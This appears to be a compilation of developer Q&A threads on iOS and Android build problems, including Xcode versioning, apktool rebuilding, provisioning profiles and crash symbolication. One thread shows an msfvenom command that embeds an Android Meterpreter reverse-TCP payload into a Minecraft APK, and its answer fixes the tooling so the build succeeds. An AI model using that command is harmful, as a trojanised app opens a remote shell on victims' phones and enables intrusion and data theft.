How to set CURRENT_PROJECT_VERSION in Xcode 8 - xcode8

Since upgrading to Xcode 8, when I do a build with fastlane, I get the following error message:
There does not seem to be a CURRENT_PROJECT_VERSION key set for this project
If I go to Xcode > Build Settings and go down to Versioning, there is a Current Project Version key, as shown below:
The help text says to enter an integer or floating point number, but when I click on the field, there is no opportunity to enter a number in either the Debug or Release field. This is different from the screen shot shown in this apple tech Q&A so there appears to have been a change in Xcode since the Q&A was released.

Don't. Modify the values in your app's info.plist file instead.
This means not using agvtool (as I learned).
Why? Over the years, Apple has come up with several manners of changing version and build numbers. Many of them are now outdated and poor practice. Changing CURRENT_PROJECT_VERSION modifies values within your project's project.pbxproj file and if you are running a distributed team, this will cause merge conflicts if the other half of the team tries to update and while they were asleep, you updated this internal value. If you are using pods, you'll get several more merge conflicts per pod that you add to the project.
Don't use it.
Within the info.plist file are these keys.
Use CFBundleVersion for your app's build number.
Use CFBundleShortVersionString for your app's version number.
Use Plistbuddy to do it.
Try the script below.
# To make executable, use: chmod u+x Build-Versioning-Scripts/
# to locate your target's info.plist use
echo "----"
echo "Info.plist for target: ${PRODUCT_SETTINGS_PATH}"
buildNum=$(/usr/libexec/Plistbuddy -c "Print CFBundleVersion" "${PRODUCT_SETTINGS_PATH}")
echo "Current build #: $buildNum"
if [ -z "$buildNum" ]; then
echo "No build number found in $PRODUCT_SETTINGS_PATH"
exit 2
buildNum=$(expr $buildNum + 1)
echo "Build # incremented to: $buildNum"
/usr/libexec/PlistBuddy -c "Set :CFBundleVersion $buildNum" "$PRODUCT_SETTINGS_PATH"
echo "----"
exit 0
By adding this script to your build or archive process on your build machine, this will automatically update the app's build number.
If you wish to increment your app's version number, change CFBundleShortVersionString (Bundle versions string, short) in the info.plist manually.

Currently when you get that fastlane error, terminal logs redirects you to
Automating Version and Build Numbers Using agvtool
to understand what you need to do.
Enable agvtool.
Build Settings > Current Project Version > $(CURRENT_PROJECT_VERSION)
Build Settings > Versioning System > Apple Generic
Set up your version and build numbers.
Target > Info > Bundle versions string, short (CFBundleShortVersionString) > "your init
Target > Info > Bundle version (CFBundleVersion) > "your
init value"
That helps me a lot.

you may try change project format ?
I suggest you can change this xcode format version.


The apk rebuild by apktool can not be installed even after zipalign and sign

I need to make hundreds flavors of my app. They have different logos and names. When I use android studio's productFlavor, it always OOM, and cost very long time to build hundreds app.
So I want to make these apps by apktool. decompile, rebuild, zipalign, apksign. But I find that, the finally generated apk can not be installed.
The error is:
Failure [INSTALL_FAILED_INVALID_APK: ed to extract native libraries, res=-2]
apktool d my_app.apk decompile
change the logo and name.
apktool b decompile my_app-rebuild.apk
zipalign -v 4 my_app-rebuild.apk my_app-align.apk
apksigner sign --ks my_key.jks --ks-pass pass:my_ks_pass --key-pass pass:my_key_pass --v1-signing-enabled true --v2-signing-enabled true --out my_app_out.apk my_app-align.apk
After these works, the my_app_out.apk can not installed.
From the error you got:
Failure [INSTALL_FAILED_INVALID_APK: ed to extract native libraries, res=-2]
If set to false, then your native libraries must be page aligned and stored uncompressed in the APK.
It's either you need to set extractNativeLibs flag to true or you need to page align the apk when doing zipaligning by adding -p parameter:
-p : should use the same page alignment for all shared object files within
The zipalign command should be:
zipalign -p -v 4 my_app-rebuild.apk my_app-align.apk

Malformed String Number Version 2.4.0 when msfvenom -x

Read all and carefully
Hi, I'm using Kali 2.0 and I love to tweak with it (Sorry for bad english but I'm italian). When I use this command:
msfvenom -x minecraft.apk -p android/meterpreter/reverse_tcp LHOST=IP_ADDRESS LPORT=4444 -o mc.apk
it gives me:
Using APK template: minecraft.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.0
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I've searched for weeks on all the forums but, I didn't found the solution. I've reinstalled Kali, metasploit-framework, jdk, apktool. Nothing was happened. Any fix?
I have struggled and got the solution. It looks like the problem was with the apktool and also the java environment variables (but in your case it could be only one issue), i uninstalled the apktool & java's(jdk,jre), reinstalled, changed versions through terminal but nothing worked.
To figure this out i read an issue on github
To temporarily fix it, run the following commands in the same terminal window where you are trying to use msfvenom:
alias='java "$_SILENT_JAVA_OPTIONS"'
To permanently fix it, place the above commands in /root/.bashrc(you have to check Show hidden files in View tab).
Now the above error message should go away, and if there is an issue with your apktool it will be displaying unable to rebuild apk with apktool. So, to figure this out read below:
SECOND ISSUE (Apktool)(unable to rebuild apk with apktool):
I have found that there is a missing file
of apktool located in usr/local/sbin. Delete apktool file from there if exists.
Download linux wrapper script
Download latest apktool from and rename it to apktool.jar
Now copy both the files (linux wrapper script & apktool.jar) to /user/local/bin
Type apktool in terminal and verify the version
P.S. For those who cant go with the steps for the second issue, go watch this fix

Wrong team/provisionning profile when using xcodebuild command

I'm trying to build a continuous integration's script on my xcode project, but I'm stuck trying to archive my xcode project using xcodebuild command. When trying :
sudo xcodebuild -scheme MyScheme -archivePath builds/XXX.xcarchive archive DEVELOPMENT_TEAM=YYY CODE_SIGN_IDENTITY='iPhone Distribution' CODE_SIGN_STYLE='Manual' PROVISIONING_PROFILE_SPECIFIER=ZZZ
XXX is my project name
YYY is my development team identifier, like ABC123DEF, it's a string
ZZZ is my provisionning profile name, not a code but a string, like "My Provisionning Profile"
I always get this error :
error: No profile for team 'YYY' matching 'ZZZ' found: Xcode couldn't find any provisioning profiles matching 'YYY/ZZZ'. Install the profile (by dragging and dropping it onto Xcode's dock item) or select a different one in the General tab of the target editor.
However, when opening manually the XCode project and trying to archive, it works perfectly.
What am I missing? How can I get the full list of team/provisionning_profile installed on my Mac?
What I have tried so far :
I tried to remove the part where I specify the development team and provisionning profile, leaving only the scheme identifier. Same result considering the scheme is defined with the same informations.
I tried to go in my mobileprovision folder to check if the provisionning profile exists (it exists)
I tried to display the xcode archive command lines in the editor (On the Report navigator tab). Actually it never shows the xcodebuild command directly but a bunch of subcommands. However I could find out that my XXX team identifier and YYY provisionning profile that I am using are using in this script
Does anyone know how I can solve this issue?
I finally found the problem, it came from the sudo before xcodebuild.
The sudo command will run the following action under the root user by default, which doesn't have any provisioning profile installed, as I always registered them under my user profile.
here is what I did :
sudo -u myuser xcodebuild -scheme MyScheme -archivePath builds/XXX.xcarchive archive DEVELOPMENT_TEAM=YYY CODE_SIGN_IDENTITY='iPhone Distribution' CODE_SIGN_STYLE='Manual' PROVISIONING_PROFILE_SPECIFIER=ZZZ
and the error disappeared.
Hope this can help someone.
Provisioning profiles are in ~/Library/MobileDevice/Provisioning Profiles/
You could add -allowProvisioningUpdates to allow xcodebuild to "solve" the problem itself, but... ¯_(ツ)_/¯ for how safe/good the result will be. You've specified "manual" so I assume you don't want to do this.
I suspect you are trying to archive the project but only have a development profile installed. Build a Release build of the project from within Xcode and that should get it to download a release (distribution) provisioning profile for you which you can then use from the command line.

ios Symbolication Server side

How to symbolicate the ios crash report after uploading to server in a linux environment where iOS development tools and scripts will not be available. I know Apple uses atos and some other tools to map the hex addresses to symbol along with .dYSM file.
I can upload .dYSM file along with crash report to server. Refered QuincyKit, but they are doing symbolication locally. But other's like HockeyApp and Critterism are doing it remotely.
Pls recommend the possible ways to do it in server.
It is possible. You can take a look at
I got it working under Linux. (Ubuntu Server) However, it takes some time to get it up and running.
Installing atosl
First, you need to install libdwarf-dev, dwarfdump, binutils-dev and libiberty-dev.
E.g. on Ubuntu:
$ sudo apt-get install libdwarf-dev dwarfdump binutils-dev libiberty-dev
Download or clone the atosl repo from GitHub:
$ git clone
CD to the atosl dir
$ cd atosl
Create a local config which contains a flag with the location of your binutil apps. (in Ubuntu by default that's /usr/bin). If you're not sure, you can find out by executing cat /var/lib/dpkg/info/binutils.list | less and copy the path of the file objdump. E.g. if the entry is /usr/bin/objdump, your path is /usr/bin.
So in the end, your should look like this:
LDFLAGS += -L/usr/bin
Compile it:
$ make
Now you can start using it:
$ ./atosl --help
Symbolicating example
To show how atosl is used, I'll provide a simple example.
Now let's take a look at a line from the crash log:
13 ErrorApp 0x000ea294 0xe3000 + 29332
To symbolicate this, we will need the load address, and the runtime address.
In this example the runtime address is 0x000ea294, and the load address is 0xe3000.
Now we have everything we need:
In this example:
$ ./atosl -o -l 0xe3000 0x000ea294
Which returns the symbolicated line:
main (in ErrorApp) (main.m:16)
Your vmaddr, which usually is 0x00001000, you can find by looking at the segname __TEXT Mach-O load command of your binary. In my example, this happens to be different, namely 0x00004000
To find the address, we need to do some math.
The address is found by the following formula:
address = vmaddr + ( runtime_address - load_address )
In this example our address is:
0x00004000 + ( 0x000ea294 - 0xe3000 ) = 0xB294
I haven't played around with this that much yet, but for now it seems to give me the results I needed. Maybe it will work for you too.
You need to implement your own linux compatible versions of atos, otool and dwarfdump (at least the functionality needed for symbolication). The Apple tools are not open source and only run on Mac OS X.
None of the services provide a solution that can be used by 3rd parties on non OS X systems. So your only chance, besides implementing the required functionality to run on your linux system, is to do it on a Mac like QuincyKit does it, see or use a third party service.
Note: I am the creator of QuincyKit and Co-Founder of HockeyApp.

Command /usr/bin/lipo failed with exit code 1 error

I have finally finished my app and I was getting ready to upload when this sudden error hit me and I have no idea what to do. I have checked other posts saying to change the code signing identity and I have done this but no luck. I tried every single option in the identity and no change. If anyone knows what is going on I would really appreciate it since I would simply just like to submit my app.
Here is what else it says in the erorr log:
/usr/bin/lipo: /Users/teddy/Library/Developer/Xcode/DerivedData/grocery_stores-dcyubhefhrcjhtcxbhldfpukdgdz/Build/Intermediates/grocery stores and /Users/teddy/Library/Developer/Xcode/DerivedData/grocery_stores-dcyubhefhrcjhtcxbhldfpukdgdz/Build/Intermediates/grocery stores have the same architectures (armv7) and can't be in the same fat output file
Command /usr/bin/lipo failed with exit code 1
I solved this issue by changing the value of the Valid Architecture found in Project > Build Settings > Architectures from the default "armv6 armv7" to "armv7". Hope this helps.
It's hard to see what exactly is happening without the command you are running. It looks to me like you are specifying the same input file twice, namely the arm7 version and lipo is telling you you can't add 2 arm7 versions of grocery stores to the universal file. Can you please enter the entire lipo command you are running? From the lipo man page:
Take the input files (or file) and create one universal output file from them.
Do you possibly have the same file listed twice here?
Try changing your build target to a simulator build, clean and re-run.
In my case I used pods and oped projectFile instead of project workspace
In my case it was building a project on simulator in a release scheme, changed it to debug and it worked.